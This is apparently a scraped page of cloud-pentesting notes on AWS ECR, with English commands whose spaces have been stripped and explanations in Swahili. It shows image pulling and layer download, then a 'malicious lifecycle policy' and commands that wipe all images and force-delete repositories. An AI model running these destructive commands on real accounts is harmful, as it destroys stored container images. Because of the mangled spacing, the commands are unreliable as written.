# Docker login into ecr## For public repo (always use us-east-1)awsecr-publicget-login-password--regionus-east-1|dockerlogin--usernameAWS--password-stdinpublic.ecr.aws/<random-id>## For private repoawsecrget-login-password--profile<profile_name>--region<region>|dockerlogin--usernameAWS--password-stdin<account_id>.dkr.ecr.<region>.amazonaws.com## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account# Downloaddockerpull<account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest## If you still have the error "Requested image not found"## It might be because the tag "latest" doesn't exit## Get valid tags with:TOKEN=$(aws--profile<profile>ecrget-authorization-token--outputtext--query'authorizationData[].authorizationToken')curl-i-H"Authorization: Basic $TOKEN"https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list# Inspect the imagedockerinspectsha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0# Upload (example uploading purplepanda with tag latest)dockertagpurplepanda:latest<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latestdockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest# Downloading without Docker# List digestsawsecrbatch-get-image--repository-namelevel2 \--registry-id 653711331788 \--image-ids imageTag=latest|jq'.images[].imageManifest | fromjson'## Download a digestawsecrget-download-url-for-layer \--repository-name level2 \--registry-id 653711331788 \--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
Baada ya kupakua picha, unapaswa kuangalia kwa habari nyeti:
Mshambuliaji mwenye mojawapo ya ruhusa hizi anaweza kuunda au kubadilisha sera ya mzunguko ili kufuta picha zote katika hifadhi na kisha kufuta hifadhi nzima ya ECR. Hii itasababisha kupoteza picha zote za kontena zilizohifadhiwa katika hifadhi.
bashCopycode#CreateaJSONfilewiththemaliciouslifecyclepolicyecho'{"rules": [{"rulePriority": 1,"description": "Delete all images","selection": {"tagStatus": "any","countType": "imageCountMoreThan","countNumber": 0},"action": {"type": "expire"}}]}'>malicious_policy.json# Apply the malicious lifecycle policy to the ECR repositoryawsecrput-lifecycle-policy--repository-nameyour-ecr-repo-name--lifecycle-policy-textfile://malicious_policy.json# Delete the ECR repositoryawsecrdelete-repository--repository-nameyour-ecr-repo-name--force# Delete the ECR public repositoryawsecr-publicdelete-repository--repository-nameyour-ecr-repo-name--force# Delete multiple images from the ECR repositoryawsecrbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0# Delete multiple images from the ECR public repositoryawsecr-publicbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0